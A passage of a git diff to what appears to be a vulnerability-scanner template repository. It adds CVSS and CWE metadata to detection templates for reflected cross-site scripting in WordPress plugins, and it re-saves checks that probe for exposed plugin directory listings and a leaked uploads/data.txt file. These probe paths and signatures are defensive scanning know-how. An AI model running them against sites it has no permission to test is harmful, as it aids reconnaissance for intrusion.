     - https://wordpress.org/plugins/clearfy
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/curcy-xss.yaml b/vulnerabilities/wordpress/curcy-xss.yaml
index bf890fbf73..c6a2793e0a 100644
--- a/vulnerabilities/wordpress/curcy-xss.yaml
+++ b/vulnerabilities/wordpress/curcy-xss.yaml
@@ -1,15 +1,19 @@
 id: curcy-xss
 
 info:
-  name: CURCY < 2.1.18 - Reflected Cross-Site Scripting
+  name: WordPress CURCY - Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress CURCY - Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37
     - https://wordpress.org/plugins/woo-multi-currency
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
index f83ef7300e..55f2b3ab4b 100644
--- a/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
+++ b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
@@ -1,25 +1,25 @@
-id: dzs-zoomsounds-listing
+id: dzs-zoomsounds-listing
 
-info:
-  name: WordPress Plugin dzs zoomsounds
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  tags: wordpress,listing,wp-plugin,wp
+info:
+  name: WordPress Plugin dzs zoomsounds
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  tags: wordpress,listing,wp-plugin,wp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/dzs-zoomsounds"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/dzs-zoomsounds"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml
index de7c8f2d98..834397599b 100644
--- a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml
+++ b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml
@@ -1,25 +1,25 @@
-id: easy-media-gallery-pro-listing
+id: easy-media-gallery-pro-listing
 
-info:
-  name: WordPress Plugin Media Gallery Pro Listing
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  reference: https://www.exploit-db.com/ghdb/6455
-  tags: wordpress,listing,wp-plugin
+info:
+  name: WordPress Plugin Media Gallery Pro Listing
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  reference: https://www.exploit-db.com/ghdb/6455
+  tags: wordpress,listing,wp-plugin
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "wp-content/plugins/easy-media-gallery-pro/"
-        condition: and
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "wp-content/plugins/easy-media-gallery-pro/"
+        condition: and
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml
index c3e91edbe5..c1341f0c0f 100644
--- a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml
+++ b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml
@@ -1,11 +1,16 @@
 id: flow-flow-social-stream-xss
 
 info:
-  name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting
+  name: WordPress Flow-Flow Social Stream <=3.0.71 - Cross-Site Scripting
   author: alph4byt3
   severity: medium
+  description: WordPress Flow-Flow Social Stream 3.0.7.1 and prior is vulnerable to cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wordpress,wpscan
 
 requests:
@@ -30,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/members-list-xss.yaml b/vulnerabilities/wordpress/members-list-xss.yaml
index 7709bc6fb6..dfe1948ff2 100644
--- a/vulnerabilities/wordpress/members-list-xss.yaml
+++ b/vulnerabilities/wordpress/members-list-xss.yaml
@@ -1,12 +1,16 @@
 id: members-list-xss
 
 info:
-  name: Members List < 4.3.7 - Reflected Cross-Site Scripting
+  name: WordPress Members List <4.3.7 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues.
+  description: WordPress Members List 4.3.7 does not sanitize and escape some parameters in various pages before outputting them back, leading to reflected cross-site scripting vulnerabilities.
   reference:
     - https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wp,wordpress,wp-plugin,xss,wpscan
 
 requests:
@@ -31,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/vulnerabilities/wordpress/modula-image-gallery-xss.yaml
index 52b32b1b23..bff1ede706 100644
--- a/vulnerabilities/wordpress/modula-image-gallery-xss.yaml
+++ b/vulnerabilities/wordpress/modula-image-gallery-xss.yaml
@@ -1,15 +1,19 @@
 id: modula-image-gallery-xss
 
 info:
-  name: Modula Image Gallery < 2.6.7 - Reflected Cross-Site Scripting
+  name: WordPress Modula Image Gallery <2.6.7 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress Modula Image Gallery 2.6.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/ee248078-89ee-4cc0-b0fe-e932cd00db3e
     - https://wordpress.org/plugins/modula-best-grid-gallery
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/new-user-approve-xss.yaml b/vulnerabilities/wordpress/new-user-approve-xss.yaml
index 489b6a9e27..a563667db3 100644
--- a/vulnerabilities/wordpress/new-user-approve-xss.yaml
+++ b/vulnerabilities/wordpress/new-user-approve-xss.yaml
@@ -1,15 +1,19 @@
 id: new-user-approve-xss
 
 info:
-  name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting
+  name: WordPress New User Approve <2.4.1 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress New User Approve 2.4.1 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a
     - https://wordpress.org/plugins/new-user-approve
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp
 
 requests:
@@ -43,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml
index 773f8addfa..f7790fbc98 100644
--- a/vulnerabilities/wordpress/sassy-social-share.yaml
+++ b/vulnerabilities/wordpress/sassy-social-share.yaml
@@ -1,13 +1,17 @@
 id: sassy-social-share-xss
 
 info:
-  name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
+  name: Sassy Social Share <=3.3.3 - Cross-Site Scripting
   author: Random_Robbie
   severity: medium
   description: |
-    AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
+    WordPress Sassy Social Share 3.3.3 and prior is vulnerable to cross-site scripting because certain AJAX endpoints return JSON data with no Content-Type header set and then use the default text/html. In other words, any JSON that has HTML will be rendered as such.
   reference:
     - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wp,wpscan,wordpress,wp-plugin,sassy
 
 requests:
@@ -34,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml
index a00a963a90..663d14f2e2 100644
--- a/vulnerabilities/wordpress/seo-redirection-xss.yaml
+++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml
@@ -1,14 +1,18 @@
 id: seo-redirection-xss
 
 info:
-  name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
+  name: WordPress SEO Redirection <7.4 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
-    The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
+    WordPress SEO Redirection 7.4 does not escape the tab parameter before outputting it back in JavaScript code, leading to a reflected cross-site scripting vulnerability.
   remediation: Fixed in version 7.4.
   reference:
     - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,xss,wp-plugin,authenticated,wpscan
 
 requests:
@@ -52,3 +56,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml
index 6144ec058e..04d9bb9eb8 100644
--- a/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml
+++ b/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml
@@ -1,15 +1,19 @@
 id: shortpixel-image-optimizer-xss
 
 info:
-  name: ShortPixel Image Optimizer < 4.22.10 - Reflected Cross-Site Scripting
+  name: WordPress ShortPixel Image Optimizer <4.22.10 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting.
+  description: WordPress ShortPixel Image Optimizer 4.22.10 does not escape generated URLs before outputting them back in an attribute, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
     - https://wordpress.org/plugins/shortpixel-image-optimiser
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml
index 988433ebce..b16d64dcae 100644
--- a/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml
+++ b/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml
@@ -1,13 +1,17 @@
 id: woocommerce-pdf-invoices-xss
 
 info:
-  name: WooCommerce PDF Invoices & Packing Slips < 2.15.0 - Reflected Cross-Site Scripting
+  name: WordPress WooCommerce PDF Invoices & Packing Slips <2.15.0 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress WooCommerce PDF Invoices & Packing Slips 2.15.0 does not escape some URLs before outputting them in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin
 
 requests:
@@ -43,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml
index b0a50a1cfe..476f3602f1 100644
--- a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml
@@ -1,11 +1,16 @@
 id: wordpress-wordfence-waf-bypass-xss
 
 info:
-  name: Wordpress Wordfence WAF - Cross-Site Scripting
+  name: Wordpress Wordfence - Cross-Site Scripting
   author: hackergautam
   severity: medium
+  description: Wordpress Wordfence is vulnerable to cross-site scripting.
   reference:
     - https://twitter.com/naglinagli/status/1382082473744564226
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,wordfence,xss,bypass
 
 requests:
@@ -28,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
index 5ada86210a..b2501e1cc3 100644
--- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
@@ -1,9 +1,14 @@
 id: wordpress-wordfence-xss
 
 info:
-  name: WordPress Wordfence 7.4.6 Cross Site Scripting
+  name: WordPress Wordfence 7.4.6 - Cross Site Scripting
   author: madrobot
   severity: medium
+  description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,wp-plugin,xss,wordfence
 
 requests:
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
index 80366e19d3..254120356e 100644
--- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
@@ -1,14 +1,18 @@
 id: wordpress-zebra-form-xss
 
 info:
-  name: Zebra_Form Library <= 2.9.8 - Cross-Site Scripting (XSS)
+  name: Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting
   author: madrobot
   severity: medium
   description: |
-    The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file.
+    Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php.
   reference:
     - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
     - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,xss,wp,wpscan
 
 requests:
@@ -41,3 +45,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-all-export-xss.yaml b/vulnerabilities/wordpress/wp-all-export-xss.yaml
index 3583198d6e..3eb71ebc08 100644
--- a/vulnerabilities/wordpress/wp-all-export-xss.yaml
+++ b/vulnerabilities/wordpress/wp-all-export-xss.yaml
@@ -1,14 +1,18 @@
 id: wp-all-export-xss
 
 info:
-  name: WP All Export < 1.3.6 - Reflected Cross-Site Scripting
+  name: WordPress All Export <1.3.6 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   metadata:
     verified: true
   reference:
     - https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan
 
 requests:
@@ -44,3 +48,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-altair-listing.yaml b/vulnerabilities/wordpress/wp-altair-listing.yaml
index d81371ddc2..3c3a1e0eda 100644
--- a/vulnerabilities/wordpress/wp-altair-listing.yaml
+++ b/vulnerabilities/wordpress/wp-altair-listing.yaml
@@ -1,28 +1,28 @@
-id: wp-altair-listing
+id: wp-altair-listing
 
-info:
-  name: Altair WordPress theme v4.8 - Directory Listing
-  author: pussycat0x
-  severity: info
-  description: Searches for directories listing in the altair theme.
-  tags: wordpress,listing,wp-theme
+info:
+  name: Altair WordPress theme v4.8 - Directory Listing
+  author: pussycat0x
+  severity: info
+  description: Searches for directories listing in the altair theme.
+  tags: wordpress,listing,wp-theme
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/themes/altair/modules/"
-      - "{{BaseURL}}/wp-content/themes/altair/functions/"
-      - "{{BaseURL}}/wp-content/themes/altair/images/flip/"
-      - "{{BaseURL}}/wp-content/themes/altair/images/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "wp-content/themes/altair"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/themes/altair/modules/"
+      - "{{BaseURL}}/wp-content/themes/altair/functions/"
+      - "{{BaseURL}}/wp-content/themes/altair/images/flip/"
+      - "{{BaseURL}}/wp-content/themes/altair/images/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "wp-content/themes/altair"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-ambience-xss.yaml b/vulnerabilities/wordpress/wp-ambience-xss.yaml
index 16bbd02f1e..40c9e68bfc 100644
--- a/vulnerabilities/wordpress/wp-ambience-xss.yaml
+++ b/vulnerabilities/wordpress/wp-ambience-xss.yaml
@@ -1,14 +1,18 @@
 id: wp-ambience-xss
 
 info:
-  name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
+  name: WordPress Ambience Theme <=1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: |
-    The ambience WordPress theme was affected by a Cross-Site Scripting (XSS) security vulnerability.
+    WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability.
   reference:
-    - https://www.exploit-db.com/exploits/38568
+    - https://www.exploit-db.com/expl oits/38568
     - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wp-plugin,wp,edb,wpscan,wordpress,xss
 
 requests:
@@ -31,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml b/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml
index 9f503d497f..9c1230c237 100644
--- a/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml
+++ b/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml
@@ -1,17 +1,21 @@
 id: wp-blogroll-fun-xss
 
 info:
-  name: WordPress Plugin Blogroll Fun-Show Last Post and Last Update Time (0.8.4) - Cross-Site Scripting
+  name: WordPress Blogroll Fun-Show Last Post and Last Update Time 0.8.4 - Cross-Site Scripting
   author: DhiyaneshDK
-  severity: medium
+  severity: high
   description: |
-    WordPress Plugin Blogroll Fun-Show Last Post and Last Update Time is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin Blogroll Fun-Show Last Post and Last Update Time version 0.8.4 is vulnerable; prior versions may also be affected.
-  remediation: Update to plugin version 0.8.5 or latest
+    WordPress Plugin Blogroll Fun-Show Last Post and Last Update Time 0.8.4 and possibly prior versions are prone to a cross-site scripting vulnerability because of a failure to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  remediation: Update to plugin version 0.8.5 or later.
   reference:
     - https://codevigilant.com/disclosure/wp-plugin-blogroll-fun-a3-cross-site-scripting-xss/
     - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-blogroll-fun-show-last-post-and-last-update-time-cross-site-scripting-0-8-4/
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,wp-plugin,xss,unauth,wp
 
 requests:
@@ -34,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml b/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
index 3c8901d1d2..62099df1e8 100644
--- a/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
@@ -1,27 +1,27 @@
-id: wp-mstore-plugin-listing
+id: wp-mstore-plugin-listing
 
-info:
-  name: Wordpress Plugin MStore API
-  author: pussycat0x
-  severity: low
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  metadata:
-    google-dork: inurl:/wp-content/plugins/mstore-api/
-  tags: wordpress,listing,wp-plugin
+info:
+  name: Wordpress Plugin MStore API
+  author: pussycat0x
+  severity: low
+  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  metadata:
+    google-dork: inurl:/wp-content/plugins/mstore-api/
+  tags: wordpress,listing,wp-plugin
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/mstore-api/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/mstore-api"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mstore-api/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/mstore-api"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml b/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml
index d4476cb5a1..b68ebad355 100644
--- a/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml
+++ b/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml
@@ -1,28 +1,28 @@
-id: wp-plugin-1-flashgallery-listing
+id: wp-plugin-1-flashgallery-listing
 
-info:
-  name: WordPress 1 flash gallery listing
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  reference: https://www.exploit-db.com/ghdb/6978
-  tags: wordpress,listing
+info:
+  name: WordPress 1 flash gallery listing
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  reference: https://www.exploit-db.com/ghdb/6978
+  tags: wordpress,listing
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/"
-      - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/1-flash-gallery"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/"
+      - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/1-flash-gallery"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-qards-listing.yaml b/vulnerabilities/wordpress/wp-qards-listing.yaml
index e1c84b21a6..b9ba98785d 100644
--- a/vulnerabilities/wordpress/wp-qards-listing.yaml
+++ b/vulnerabilities/wordpress/wp-qards-listing.yaml
@@ -1,25 +1,25 @@
-id: wp-qards-listing
+id: wp-qards-listing
 
-info:
-  name: WordPress Plugin Qards
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  tags: wordpress,listing,wp-plugin,wp
+info:
+  name: WordPress Plugin Qards
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  tags: wordpress,listing,wp-plugin,wp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/qards/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/qards"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/qards/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/qards"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml
index a43984072a..ad366b15a7 100644
--- a/vulnerabilities/wordpress/wp-upload-data.yaml
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@@ -1,29 +1,29 @@
-id: wordpress-upload-data
+id: wordpress-upload-data
 
-info:
-  name: wordpress-upload-data
-  author: pussycat0x
-  severity: medium
-  description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
-  reference: https://www.exploit-db.com/ghdb/7040
-  tags: wordpress,listing
+info:
+  name: wordpress-upload-data
+  author: pussycat0x
+  severity: medium
+  description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
+  reference: https://www.exploit-db.com/ghdb/7040
+  tags: wordpress,listing
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/uploads/data.txt"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "admin:"
-
-      - type: word
-        part: header
-        words:
